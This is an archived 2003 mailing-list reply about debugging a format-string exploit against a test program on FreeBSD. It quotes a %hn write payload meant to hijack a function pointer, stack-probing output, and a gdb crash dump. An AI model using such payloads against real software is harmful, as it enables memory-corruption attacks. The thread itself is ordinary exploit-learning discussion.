>>[%.-16457x%8$hn%.15261x%9$hn] (35)
>>
>^---- first question is your input still at %8$x and %9$x on the bsd box?

yep, see here:

> uname
FreeBSD
> ./vuln AAAABBBB%x%x%x%x%x%x%x%x%x
0 0xbfbffccc
1 0xbfbffcd3
helloWorld() = 0x8048770
accessForbidden() = 0x80487a0
before : ptrf() = 0x8048770 (0xbfbffad8)
buffer = [AAAABBBB2805f00022806dfe4105b6cc2805f100bfbffb1480487704141414142424242] (71)
after : ptrf() = 0x8048770 (0xbfbffad8)
Welcome in "helloWorld"

>>...
>>Segmentation fault (core dumped)
>>
>^---- second ... what does the bt look like in gdb...

here we go, the fmt seems to corrupt eax

> gdb -core vuln.core
GNU gdb 4.18
. . .
This GDB was configured as "i386-unknown-freebsd".
Core was generated by `vuln'.
Program terminated with signal 11, Segmentation fault.
#0 0x40517d31 in ?? ()
(gdb) bt
#0 0x40517d31 in ?? ()
#1 0x8048805 in ?? ()
#2 0x8048767 in ?? ()
#3 0x8048561 in ?? ()
(gdb) i reg
eax    0x40517d31 1079082289
ecx    0x8049a70  134519408
edx    0x280e9968 672045416
ebx    0x280e8424 672039972
esp    0xbfbffad4 0xbfbffad4
ebp    0xbfbffae0 0xbfbffae0
esi    0x1        1
edi    0x280e9960 672045408
eip    0x40517d31 0x40517d31
eflags 0x10216    66070
cs     0x1f       31
ss     0x2f       47
ds     0x2f       47
es     0x2f       47
fs     0x2f       47
gs     0x2f       47
(gdb) x/1x $eax
0x40517d31: Cannot access memory at address 0x40517d31.

kind regards
Ingram
This archive was generated by hypermail 2b30 : Sat Jun 21 2003 - 11:12:57 PDT